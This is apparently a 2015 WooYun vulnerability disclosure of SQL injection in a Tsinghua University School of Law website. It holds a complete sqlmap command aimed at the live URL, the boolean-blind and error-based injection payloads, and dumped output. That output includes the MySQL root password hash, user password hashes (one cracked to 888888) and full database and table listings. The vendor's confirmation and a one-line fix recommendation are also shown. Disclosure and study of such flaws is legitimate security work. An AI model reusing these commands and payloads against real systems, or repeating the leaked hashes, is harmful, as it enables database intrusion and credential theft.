Vulnerability summary

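ID: wooyun-2015-0157253

Title: SQL injection in a Tsinghua University School of Law site (DBA privileges + root password + user passwords)

Vendor: Tsinghua University

Author: 路人甲

Submitted: 2015-12-01 10:24

Fixed: 2016-01-15 15:14

Disclosed: 2016-01-15 15:14

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]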


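Vulnerability details

Disclosure status:

2015-12-01: Details reported to the vendor; awaiting vendor handling
2015-12-01: Vendor confirmed; details disclosed to the vendor only
2015-12-11: Details disclosed to core white hats and experts in related fields
2015-12-21: Details disclosed to regular white hats
2015-12-31: Details disclosed to intern white hats
2016-01-15: Details disclosed to the public

Brief description:

RT

Detailed description:

URL: http://academic.law.tsinghua.edu.cn/homepage/index.php?r=search/index&keyword=XPGZ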

$ python sqlmap.py -u "http://academic.law.tsinghua.edu.cn/homepage/index.php?r=search/index&keyword=XPGZ" -p keyword --technique=BE --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


current user:    'root@localhost'
current user is DBA: True
database management system users [2]:
[*] 'root'@'%'
[*] 'root'@'localhost'
database management system users password hashes:
[*] root [1]:
password hash: *82ABFA4A96C08F6E5CAA1784CC0698E6049EC9FD


Database: qinghua
Table: user
[8 entries]
+-------------------------------------------+
| password |
+-------------------------------------------+
| 0b3efc6f804c4dd320748c6578b0a354 |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 21218cca77804d2ba1922c33e0151105 (888888) |
| 2f12ad13e7a6a2710549efb5f4b86a5b |
| 9a40453cf2388c08223b95600237eb39 |
+-------------------------------------------+

Proof of vulnerability:

---
Parameter: keyword (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: r=search/index&keyword=-5786" OR 6891=6891#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: r=search/index&keyword=-8809" OR 1 GROUP BY CONCAT(0x7170786a71,(SELECT (CASE WHEN (3197=3197) THEN 1 ELSE 0 END)),0x717a707671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.2.0
back-end DBMS: MySQL >= 5.0.0
current user: 'root@localhost'
current user is DBA: True
database management system users [2]:
[*] 'root'@'%'
[*] 'root'@'localhost'
database management system users password hashes:
[*] root [1]:
password hash: *82ABFA4A96C08F6E5CAA1784CC0698E6049EC9FD
Database: qinghua
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| notice | 3114 |
| notice1 | 1027 |
| photo | 184 |
| tree | 163 |
| link | 111 |
| acategory | 23 |
| video_info | 10 |
| `user` | 8 |
| authassignment | 8 |
| website | 6 |
| authitem | 4 |
| authitemchild | 3 |
| tuijian | 1 |
| visit | 1 |
+---------------------------------------+---------+
Database: law
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| bak_components | 32 |
| bak_plugins | 32 |
| jos_components | 32 |
| jos_plugins | 32 |
| bak_modules | 15 |
| jos_modules | 15 |
| bak_core_acl_aro_groups | 11 |
| jos_core_acl_aro_groups | 11 |
| bak_groups | 3 |
| jos_groups | 3 |
| bak_templates_menu | 2 |
| jos_templates_menu | 2 |
| bak_core_acl_aro_sections | 1 |
| bak_menu | 1 |
| bak_menu_types | 1 |
| bak_modules_menu | 1 |
| jos_core_acl_aro | 1 |
| jos_core_acl_aro_sections | 1 |
| jos_core_acl_groups_aro_map | 1 |
| jos_menu | 1 |
| jos_menu_types | 1 |
| jos_modules_menu | 1 |
| jos_session | 1 |
| jos_users | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1918 |
| STATISTICS | 418 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 275 |
| SESSION_VARIABLES | 275 |
| KEY_COLUMN_USAGE | 239 |
| PARTITIONS | 213 |
| TABLES | 213 |
| TABLE_CONSTRAINTS | 184 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128 |
| COLLATIONS | 127 |
| USER_PRIVILEGES | 52 |
| CHARACTER_SETS | 36 |
| PLUGINS | 10 |
| ENGINES | 8 |
| SCHEMATA | 6 |
| PROCESSLIST | 1 |
+---------------------------------------+---------+
Database: tsinghualawnet
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| jos_vvcounter_logs | 67791 |
| notice | 1882 |
| jos_content | 1793 |
| notice1 | 1027 |
| jos_messages | 197 |
| photo | 183 |
| jos_modules_menu | 157 |
| tree | 150 |
| jos_categories | 121 |
| jos_weblinks | 109 |
| link | 109 |
| jos_content_frontpage | 101 |
| jos_phocagallery | 97 |
| jos_modules | 75 |
| jos_menu | 71 |
| jos_components | 60 |
| jos_jce_plugins | 58 |
| jos_jp_registry | 52 |
| jos_plugins | 49 |
| jos_jp_stats | 21 |
| jos_sections | 17 |
| jos_attachments | 16 |
| jos_core_acl_aro_groups | 11 |
| jos_gk2_tabs_manager_tabs | 10 |
| `user` | 9 |
| authassignment | 9 |
| jos_gk3_tabs_manager_options | 8 |
| jos_gk3_tabs_manager_tabs | 7 |
| jos_menu_types | 6 |
| website | 6 |
| authitem | 4 |
| jos_gk2_tabs_manager_groups | 4 |
| jos_phocagallery_categories | 4 |
| jos_templates_menu | 4 |
| authitemchild | 3 |
| jos_core_acl_aro | 3 |
| jos_core_acl_groups_aro_map | 3 |
| jos_gk2_tabs_manager_plugins | 3 |
| jos_groups | 3 |
| jos_jp_temp | 3 |
| jos_users | 3 |
| jos_gk3_tabs_manager_groups | 2 |
| jos_jce_groups | 2 |
| jos_contact_details | 1 |
| jos_core_acl_aro_sections | 1 |
| jos_gk2_tabs_manager_extensions | 1 |
| jos_jce_extensions | 1 |
| jos_jp_profiles | 1 |
| jos_session | 1 |
| tuijian | 1 |
| video_info | 1 |
| visit | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 990 |
| help_topic | 504 |
| help_keyword | 450 |
| help_category | 37 |
| `user` | 2 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: qinghua
Table: user
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: law
Table: jos_users
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: law
Table: bak_users
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: tsinghualawnet
Table: jos_users
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: tsinghualawnet
Table: user
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: mysql
Table: servers
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| Password | char(64) |
+----------+----------+

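Fix:

Deploy a WAF.

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-12-01 15:13

Vendor reply:

Thank you for the reminder; we will handle it as soon as possible.

Latest status:

None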